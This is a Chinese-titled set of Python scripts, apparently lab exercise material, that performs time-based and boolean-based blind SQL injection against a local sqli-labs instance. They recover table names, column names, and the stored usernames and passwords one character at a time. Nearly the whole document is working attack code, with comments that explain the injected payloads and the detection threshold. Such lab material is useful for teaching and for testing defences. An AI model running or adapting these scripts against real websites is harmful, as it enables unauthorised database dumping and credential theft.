时间盲注,boolean盲注,获取表、列、具体数据的函数
时间盲注:
获取表:
import requests
import time
# Target: a local sqli-labs instance (Less-9, time-based blind). The lab
# concatenates the `id` query parameter into its SQL text, which is the
# defect being demonstrated; a parameterized query would leave these
# probes inert.
url = "http://127.0.0.1/sqli-labs-php7-master/Less-9/index.php"
# Seconds the injected SLEEP() asks for; also the decision threshold below.
delay = 2


def is_injected(payload):
    """Return True when the probe made the server stall past ``delay``.

    ``payload`` is spliced into the ``id`` parameter and one round trip is
    timed.  A client-side timeout (deadline ``delay + 1`` seconds) is taken
    as a hit outright.  The check is pure wall-clock, so an ordinarily slow
    round trip is indistinguishable from a real SLEEP(); that is a known
    source of false positives in this kind of probing.
    """
    probe_id = f"1' AND {payload}-- "
    started = time.time()
    try:
        requests.get(url, params={"id": probe_id}, timeout=delay + 1)
    except requests.exceptions.Timeout:
        return True
    elapsed = time.time() - started
    return elapsed > delay
# Recover the first table name one position at a time: every printable
# ASCII value (32..126) is tried until the server sleeps.  The first
# position with no match ends the loop (end of the name, or a character
# outside that range).  Each position costs up to 95 requests that differ
# only in one number, each holding a connection for ~delay seconds — a very
# visible pattern in access logs.
table = []
for pos in range(1, 30):
    matched = None
    for c in range(32, 127):
        payload = (
            "IF(ASCII(SUBSTR((SELECT table_name FROM information_schema.tables "
            f"WHERE table_schema=DATABASE() LIMIT 1),{pos},1))={c},SLEEP({delay}),0)"
        )
        if is_injected(payload):
            matched = chr(c)
            break
    if matched is None:
        break
    table.append(matched)
    print("".join(table))
print("".join(table))
获取列:
import requests
import time
# Same local sqli-labs target (Less-9, time-based blind); the `id`
# parameter is concatenated into the lab's SQL text unescaped.
url = "http://127.0.0.1/sqli-labs-php7-master/Less-9/index.php"
# Seconds the injected SLEEP() asks for; also the decision threshold below.
delay = 2
# Table whose column names are recovered by the loop that follows.
table_name = "emails"


def is_injected(payload):
    """Return True when the probe made the server stall past ``delay``.

    ``payload`` is spliced into the ``id`` parameter and one round trip is
    timed.  A client-side timeout (deadline ``delay + 1`` seconds) counts
    as a hit.  The check is pure wall-clock, so network slowness alone can
    produce a false positive.
    """
    probe_id = f"1' AND {payload}-- "
    started = time.time()
    try:
        requests.get(url, params={"id": probe_id}, timeout=delay + 1)
    except requests.exceptions.Timeout:
        return True
    elapsed = time.time() - started
    return elapsed > delay
# Recover the first column name of `table_name`, one position at a time,
# by trying every printable ASCII value until the server sleeps.  The
# first position with no match ends the loop.
column = []
for pos in range(1, 30):
    matched = None
    for c in range(32, 127):
        payload = (
            "IF(ASCII(SUBSTR((SELECT column_name FROM information_schema.columns "
            f"WHERE table_name='{table_name}' LIMIT 1),{pos},1))={c},SLEEP({delay}),0)"
        )
        if is_injected(payload):
            matched = chr(c)
            break
    if matched is None:
        break
    column.append(matched)
    print("".join(column))
print(''.join(column))
获取具体数据:
import requests
import time
# Same local sqli-labs target (Less-9, time-based blind); the `id`
# parameter is concatenated into the lab's SQL text unescaped.
url = "http://127.0.0.1/sqli-labs-php7-master/Less-9/index.php"
# Seconds the injected SLEEP() asks for; also the decision threshold below.
delay = 2
# Table and column read by the loop that follows.
table_name = "emails"
column_name = "id"


def is_injected(payload):
    """Return True when the probe made the server stall past ``delay``.

    ``payload`` is spliced into the ``id`` parameter and one round trip is
    timed.  A client-side timeout (deadline ``delay + 1`` seconds) counts
    as a hit.  The check is pure wall-clock, so network slowness alone can
    produce a false positive.
    """
    probe_id = f"1' AND {payload}-- "
    started = time.time()
    try:
        requests.get(url, params={"id": probe_id}, timeout=delay + 1)
    except requests.exceptions.Timeout:
        return True
    elapsed = time.time() - started
    return elapsed > delay
# Recover the first value of `column_name` in `table_name`, one position
# at a time (up to 49), trying every printable ASCII value until the
# server sleeps.  The first position with no match ends the loop.
data = []
for pos in range(1, 50):
    matched = None
    for c in range(32, 127):
        payload = (
            f"IF(ASCII(SUBSTR((SELECT {column_name} FROM {table_name} LIMIT 1),"
            f"{pos},1))={c},SLEEP({delay}),0)"
        )
        if is_injected(payload):
            matched = chr(c)
            break
    if matched is None:
        break
    data.append(matched)
    print("".join(data))
print(''.join(data))
boolean盲注:
获取表:
import requests
# Target: the same local sqli-labs instance, Less-8 (boolean-based blind).
# The page body either contains the marker text below or it does not; that
# single bit per request is all the scripts in this section rely on, which
# is why a parameterized query (no bit to leak) is the fix on the server.
url = 'http://127.0.0.1/sqli-labs-php7-master/Less-8?id=1%27'
# URL-encoded tail appended to `url`; {t}, {w} and {A} are filled per probe
# (table index, character position, guessed ASCII code).
payload = ('and%20ascii(substr((select%20table_name%20from%20information_schema.tables%20where%20table_schema='
           'database()%20limit%20{t},1),{w},1))={A}%20--%20k')
# ASCII codes tried for each position, in the author's order.  Note that
# 173, 175 and 176 are outside 7-bit ASCII.
list1 = [
    64, 94, 96, 124, 176, 40, 41,
    *range(48, 58),
    173, 175, 95,
    *range(65, 91),
    *range(97, 123),
    44,
]
# Marker that appears in the lab's page when the injected condition holds.
str1 = "You are in..........."
str2 = str1.encode('utf-8')
# One accumulator per table index 0..3.
tables1 = tables2 = tables3 = tables4 = ''
# Walk tables 0..3 (LIMIT {t},1), up to 9 positions each.  A position with
# no matching code is simply skipped; there is no early stop at the end of
# a name.  Each recovered character shows up server-side as a run of
# requests differing only in the `{A}` value.
for i in range(0, 4):
    for j in range(1, 10):
        for s in list1:
            probe = payload.format(t=i, w=j, A=s)
            resp = requests.get(url + probe)
            if str2 not in resp.content:
                continue
            found = chr(s)
            if i == 0:
                tables1 += found
                print(u"正在对比第1个表,", u"第", j, u"个字符", tables1)
            elif i == 1:
                tables2 += found
                print(u"正在对比第2个表,", u"第", j, u"个字符", tables2)
            elif i == 2:
                tables3 += found
                print(u"正在对比第3个表,", u"第", j, u"个字符", tables3)
            elif i == 3:
                tables4 += found
                print(u"正在对比第4个表,", u"第", j, u"个字符", tables4)
            break
print('tables1-->', tables1)
print('tables2-->', tables2)
print('tables3-->', tables3)
print('tables4-->', tables4)
获取列:
import requests
# Candidate characters for each position, tried in this order.
list1 = list('abcdefghijklmnopqrstuvwxyz@1234567890!-|_ABCDEFGHIJKLMNOPQRSTUVWXYZ.')
# Same local sqli-labs target (Less-8, boolean-based blind).
url = 'http://127.0.0.1/sqli-labs-php7-master/Less-8?id=1%27'
# Prefix comparison via LEFT(): {w} picks the column (LIMIT {w},1), {n} is
# the prefix length, {c} the prefix recovered so far plus one more guess.
payload = ('%20and%20left((select%20column_name%20from%20information_schema.columns%20where%20table_schema=%27security'
           '%27%20and%20table_name=%27users%27%20limit%20{w},1),{n})=%27{c}%27%20--%20k')
# Accumulators for up to five column names.
column = [''] * 5
# Marker that appears in the lab's page when the injected condition holds.
str1 = 'You are in...........'
str2 = str1.encode('utf-8')
# Only the first three columns are probed (j in 0..2), up to eight
# characters each; entries 3 and 4 of `column` are printed but stay empty.
for j in range(0, 3):
    for i in range(1, 9):
        for ch in list1:
            probe = payload.format(w=j, n=i, c=column[j] + ch)
            resp = requests.get(url + probe)
            if str2 in resp.content:
                column[j] += ch
                print(u'正在对比第', j+1, u'个字段第', i, u'个字符', column[j])
                break
for idx, name in enumerate(column, start=1):
    print('column', idx, '-->', name)
获取具体数据:
import requests
# Candidate characters for each position, tried in this order.
list1 = list('abcdefghijklmnopqrstuvwxyz@1234567890!-|_ABCDEFGHIJKLMNOPQRSTUVWXYZ.')
# Same local sqli-labs target (Less-8, boolean-based blind).
url = 'http://127.0.0.1/sqli-labs-php7-master/Less-8?id=1%27'
# Prefix comparison via LEFT() on the `username` column: {n} is the row id,
# {w} the prefix length, {d} the prefix recovered so far plus one guess.
payload = '%20and%20left((select%20username%20from%20users%20where%20id%20={n}),{w})=%27{d}%27%20--%20k'
# Marker that appears in the lab's page when the injected condition holds.
str1 = 'You are in...........'
str2 = str1.encode('utf-8')
# One accumulator per row id 1..14 (index = id - 1).
username = [''] * 14
password = [''] * 14
# Rows 1..14, up to ten characters each.  Unlike the column script above,
# this loop does not stop at the first match, so the remaining candidates
# for that position are still sent before moving on.
for i in range(1, 15):
    for j in range(1, 11):
        for ch in list1:
            probe = payload.format(n=i, w=j, d=username[i-1] + ch)
            resp = requests.get(url + probe)
            if str2 in resp.content:
                username[i-1] += ch
                print(u'正在对比第', i, u'个记录的username的第', j, u'个字符', username[i-1])
# Same prefix comparison, now against the `password` column.
payload2 = '%20and%20left((select%20password%20from%20users%20where%20id%20={n}),{w})=%27{d}%27%20--%20k'
for i in range(1, 15):
    for j in range(1, 11):
        for ch in list1:
            probe = payload2.format(n=i, w=j, d=password[i-1] + ch)
            resp = requests.get(url + probe)
            if str2 in resp.content:
                password[i-1] += ch
                print(u'正在对比第', i, u'个记录的password的第', j, u'个字符', password[i-1])
# Final report: one line per row id.
print('id username password')
for row_id, (user, pwd) in enumerate(zip(username, password), start=1):
    print(row_id, '-', user, '-', pwd)